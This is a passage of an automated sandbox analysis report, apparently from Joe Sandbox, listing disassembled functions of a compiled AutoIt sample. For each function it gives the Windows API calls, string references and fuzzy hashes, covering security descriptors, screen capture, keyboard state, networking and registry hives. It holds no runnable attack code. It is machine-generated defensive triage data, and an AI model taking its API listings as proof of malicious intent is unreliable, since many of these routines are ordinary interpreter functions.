Part of subcall function 00AF87E7: HeapAlloc.KERNEL32(00000000,?,00AF8240,?), ref: 00AF87FA
Part of subcall function 00AF87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AF8240,?), ref: 00AF880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AF8458
_memset.LIBCMT ref: 00AF846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AF848C
GetLengthSid.ADVAPI32(?), ref: 00AF849D
GetAce.ADVAPI32(?,00000000,?), ref: 00AF84DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AF84F6
GetLengthSid.ADVAPI32(?), ref: 00AF8513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AF8522
HeapAlloc.KERNEL32(00000000), ref: 00AF8529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AF854A
CopySid.ADVAPI32(00000000), ref: 00AF8551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AF8582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AF85A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AF85BC

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 9403c56443a78f3e2069bba936eea0ed3dc2be85fae91980ab5e9ae076906075
Instruction ID: b38eb318d8b5a427cb9874c25456e96d2df2ed14035113511bdc870295e56fc7
Opcode Fuzzy Hash: 9403c56443a78f3e2069bba936eea0ed3dc2be85fae91980ab5e9ae076906075
Instruction Fuzzy Hash: B3612B71A0020AABDF10DFA4DD45EBEBBB9FF05300F148169FA15A7291DB399A15CF60

Function 00B1762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B176A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B176AE
CreateCompatibleDC.GDI32(?), ref: 00B176BA
SelectObject.GDI32(00000000,?), ref: 00B176C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B1771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B17757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B1777B
SelectObject.GDI32(00000006,?), ref: 00B17783
DeleteObject.GDI32(?), ref: 00B1778C
DeleteDC.GDI32(00000006), ref: 00B17793
ReleaseDC.USER32(00000000,?), ref: 00B1779E

Strings

(, xrefs: 00B17723

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 175b2a72394166634ca4f0f23080a65c617adb7e38583052946b80c54dfb2683
Instruction ID: 603c7dcb87ff2df1e8b174476d8b38b20e239b1e01997c04e949eb6530d3f83b
Opcode Fuzzy Hash: 175b2a72394166634ca4f0f23080a65c617adb7e38583052946b80c54dfb2683
Instruction Fuzzy Hash: 8D514875904209EFCB25CFA8CC85EAEBBF9EF48710F14856DF949A7250DB31A941CB60

Function 00B0A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00B2FB78), ref: 00B0A0FC

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 00B0A11E
__swprintf.LIBCMT ref: 00B0A177
__swprintf.LIBCMT ref: 00B0A190
_wprintf.LIBCMT ref: 00B0A246
_wprintf.LIBCMT ref: 00B0A264

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00B0A241
Error: , xrefs: 00B0A20E
^ ERROR, xrefs: 00B0A1E8
Line %d (File "%s"):, xrefs: 00B0A171, 00B0A18A
"%s" (%d) : ==> %s:, xrefs: 00B0A25F

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 35596ed9b7cfa504bd2721b89ade90bd07cbd9dea83dfc0dd8c6ba38582af3fb
Instruction ID: bbda522631f1472cc1f28a0542ccdbe8e30783bdccb3b69d910b4bfc52491afc
Opcode Fuzzy Hash: 35596ed9b7cfa504bd2721b89ade90bd07cbd9dea83dfc0dd8c6ba38582af3fb
Instruction Fuzzy Hash: FB515B72900209AACF15EBE0CE86EEEBBB9AF05300F1045A5F505730E1EB316F59DB61

Function 00AA6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00AA6C6C,?,00008000), ref: 00AC0BB7

Part of subcall function 00AA48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA48A1,?,?,00AA37C0,?), ref: 00AA48CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AA6D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00AA6E5A

Part of subcall function 00AA59CD: _wcscpy.LIBCMT ref: 00AA5A05

Part of subcall function 00AC387D: _iswctype.LIBCMT ref: 00AC3885

Strings

EA06, xrefs: 00ADE87B
Bad directive syntax error, xrefs: 00ADEBC6
>>>AUTOIT SCRIPT<<<, xrefs: 00ADE8BF
Error opening the file, xrefs: 00ADE866, 00ADE8E1
Unterminated string, xrefs: 00ADEC0D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00ADE84A
AU3!, xrefs: 00AA6CC1

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 74b320852f0280a23cc00c499786305ec6a4fc161b9163487ab335e21b319024
Instruction ID: 32001b8472818412b8c185ba88736aeb8ae16fb3ca0904c6216a8a528b1859e0
Opcode Fuzzy Hash: 74b320852f0280a23cc00c499786305ec6a4fc161b9163487ab335e21b319024
Instruction Fuzzy Hash: 9D028D315083419FC724EF24C991AAFBBF5BF9A354F04492EF48A972A1DB30D949CB52

Function 00AA45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AA45F9
GetMenuItemCount.USER32(00B66890), ref: 00ADD7CD
GetMenuItemCount.USER32(00B66890), ref: 00ADD87D
GetCursorPos.USER32(?), ref: 00ADD8C1
SetForegroundWindow.USER32(00000000), ref: 00ADD8CA
TrackPopupMenuEx.USER32(00B66890,00000000,?,00000000,00000000,00000000), ref: 00ADD8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00ADD8E9

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: b2d36935cc7f8f7a3dd401a8ac97bceead891a4ea00cbae7a46e1bd4d90b2eef
Instruction ID: 7177f33c41ab17496e128bb180428f94879774193dd322a7dcf409395c6903c1
Opcode Fuzzy Hash: b2d36935cc7f8f7a3dd401a8ac97bceead891a4ea00cbae7a46e1bd4d90b2eef
Instruction Fuzzy Hash: E271C470640206BEEB319F64DC89FAABF74FF45764F204266F515A72E1CBB1A810DB90

Function 00B210A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B20038,?,?), ref: 00B210BC

Strings

HKLM, xrefs: 00B2113A
HKU, xrefs: 00B211CE
HKEY_CLASSES_ROOT, xrefs: 00B2114F
HKEY_CURRENT_CONFIG, xrefs: 00B21179
HKEY_USERS, xrefs: 00B211BD
HKEY_CURRENT_USER, xrefs: 00B2119B
HKEY_LOCAL_MACHINE, xrefs: 00B21125
HKCC, xrefs: 00B2118A
HKCU, xrefs: 00B211AC
HKCR, xrefs: 00B21164

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: cc0856e0e18e26a0e2b8ee7cb87968f6ce736392a53832da0e9d39ac818e4c97
Instruction ID: a90a2d03090517ae8067f43569eb017dd4816a1cb6f880a658d5deb1b76b5a2b
Opcode Fuzzy Hash: cc0856e0e18e26a0e2b8ee7cb87968f6ce736392a53832da0e9d39ac818e4c97
Instruction Fuzzy Hash: 32412B3115025ACBCF51EE94E991EEA37A4EF25341F504898FC966B292DB30AE1ACB50

Function 00B05569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66

Part of subcall function 00AA7A84: _memmove.LIBCMT ref: 00AA7B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B055D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B055E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B055F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B0560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B0561C

Strings

alias PlayMe, xrefs: 00B055AB
open , xrefs: 00B05581
status PlayMe mode, xrefs: 00B055CD
close PlayMe, xrefs: 00B055E3, 00B05610
play PlayMe, xrefs: 00B05617
play PlayMe wait, xrefs: 00B05606

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 893deb97203d9d27a7105a9fa3f082e7229a47a34a5ed9242de1d47012843c99
Instruction ID: ec03e669eac7c8aa92421917ead943b3a5f55aad44058af0c2260d71b9c62179
Opcode Fuzzy Hash: 893deb97203d9d27a7105a9fa3f082e7229a47a34a5ed9242de1d47012843c99
Instruction Fuzzy Hash: F311863159015979D730A661CC49EFF7FBCEF96B44F4405E9B801A30E1DF611D09C9A5

Function 00B048F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B0490E
gethostname.WSOCK32(?,00000100), ref: 00B04928
gethostbyname.WSOCK32(?), ref: 00B04935
_wcscpy.LIBCMT ref: 00B0495D
_memmove.LIBCMT ref: 00B04970
inet_ntoa.WSOCK32(?), ref: 00B0497B
_strcat.LIBCMT ref: 00B04989
_wcscpy.LIBCMT ref: 00B049A0
WSACleanup.WSOCK32 ref: 00B049AE
_wcscpy.LIBCMT ref: 00B049BC

Strings

0.0.0.0, xrefs: 00B04957

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: d11f1f1f1eb3989d45572e3f39486ed4ae6d28806d5b492f9f7772016d581753
Instruction ID: fca65e3c0f23d710ab239b6fdc62199f8eeda30d4efe62a023c1695f8669d3d3
Opcode Fuzzy Hash: d11f1f1f1eb3989d45572e3f39486ed4ae6d28806d5b492f9f7772016d581753
Instruction Fuzzy Hash: 8A11D571904119AFCB20AB249D4AFEB7BFCDB41750F0501F9F504960A1EF709E829791

Function 00B05217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00B0521C

Part of subcall function 00AC0719: timeGetTime.WINMM(?,75C0B400,00AB0FF9), ref: 00AC071D

Sleep.KERNEL32(0000000A), ref: 00B05248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00B0526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B0528E
SetActiveWindow.USER32 ref: 00B052AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B052BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 00B052DA
Sleep.KERNEL32(000000FA), ref: 00B052E5
IsWindow.USER32 ref: 00B052F1
EndDialog.USER32(00000000), ref: 00B05302

Strings

BUTTON, xrefs: 00B05280

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: f3ad77696035a19767e61acf06ba5fdc33d47c3027e8191c9d3725338db9d313
Instruction ID: 290722e3e58d88716f0a3047c68eff1c417d848eea4d664ccdd345892474859b
Opcode Fuzzy Hash: f3ad77696035a19767e61acf06ba5fdc33d47c3027e8191c9d3725338db9d313
Instruction Fuzzy Hash: 9C218E70244706AFE7215B20ED99E363FA9EB6478AF0014B8F502935F1DFA99C058E21

Function 00B0D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C

CoInitialize.OLE32(00000000), ref: 00B0D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B0D8E8
SHGetDesktopFolder.SHELL32(?), ref: 00B0D8FC
CoCreateInstance.OLE32(00B32D7C,00000000,00000001,00B5A89C,?), ref: 00B0D948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B0D9B7
CoTaskMemFree.OLE32(?,?), ref: 00B0DA0F
_memset.LIBCMT ref: 00B0DA4C
SHBrowseForFolderW.SHELL32(?), ref: 00B0DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B0DAAB
CoTaskMemFree.OLE32(00000000), ref: 00B0DAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B0DAE9
CoUninitialize.OLE32(00000001,00000000), ref: 00B0DAEB

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: f06b86973d76718f809beabd4b5b1235917daa85c65d801196ac9652cdde2f56
Instruction ID: 42bafa5e231d32d94c80167a4b87d7e7a19d74ee922b07eec11c549ce7d796c6
Opcode Fuzzy Hash: f06b86973d76718f809beabd4b5b1235917daa85c65d801196ac9652cdde2f56
Instruction Fuzzy Hash: 3DB1FD75A00209AFDB14DFA4C984DAEBBF9FF49314B1484A9F505EB2A1DB30ED45CB50

Function 00B0052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B005A7
SetKeyboardState.USER32(?), ref: 00B00612
GetAsyncKeyState.USER32(000000A0), ref: 00B00632
GetKeyState.USER32(000000A0), ref: 00B00649
GetAsyncKeyState.USER32(000000A1), ref: 00B00678
GetKeyState.USER32(000000A1), ref: 00B00689
GetAsyncKeyState.USER32(00000011), ref: 00B006B5
GetKeyState.USER32(00000011), ref: 00B006C3
GetAsyncKeyState.USER32(00000012), ref: 00B006EC
GetKeyState.USER32(00000012), ref: 00B006FA
GetAsyncKeyState.USER32(0000005B), ref: 00B00723
GetKeyState.USER32(0000005B), ref: 00B00731

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: e81e476bc266266e2d3330e5f8ec917a42096efa7a9efba22f1665900051ee5b
Instruction ID: b00aede558b297edc1fe34f1cabbf13b79ab627ff0201e3648e61bd15f8d29e3
Opcode Fuzzy Hash: e81e476bc266266e2d3330e5f8ec917a42096efa7a9efba22f1665900051ee5b
Instruction Fuzzy Hash: 6851D930A1478829FB35FBA488557EABFF5DF11380F0885D9D5C2571C2DA649B4CCB61

Function 00AFC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00AFC746
GetWindowRect.USER32(00000000,?), ref: 00AFC758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00AFC7B6
GetDlgItem.USER32(?,00000002), ref: 00AFC7C1
GetWindowRect.USER32(00000000,?), ref: 00AFC7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00AFC827
GetDlgItem.USER32(?,000003E9), ref: 00AFC835
GetWindowRect.USER32(00000000,?), ref: 00AFC846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00AFC889
GetDlgItem.USER32(?,000003EA), ref: 00AFC897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AFC8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 00AFC8C1

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: ad23c421565daadf9083f650000f9b47c583c5bcb18089496faf92c270356760
Instruction ID: d64e0ea174f4f20200df59c0d2eb042b5564644b88ab64452956fbf40cdf81a3
Opcode Fuzzy Hash: ad23c421565daadf9083f650000f9b47c583c5bcb18089496faf92c270356760
Instruction Fuzzy Hash: 64512071B00209ABDB18CFA9DD99ABEBBB6EB88711F14813DF615D7290DB709D01CB50

Function 00AA201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AA2036,?,00000000,?,?,?,?,00AA16CB,00000000,?), ref: 00AA1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00AA20D3
KillTimer.USER32(-00000001,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00AA216E
DestroyAcceleratorTable.USER32(00000000), ref: 00ADBEF6
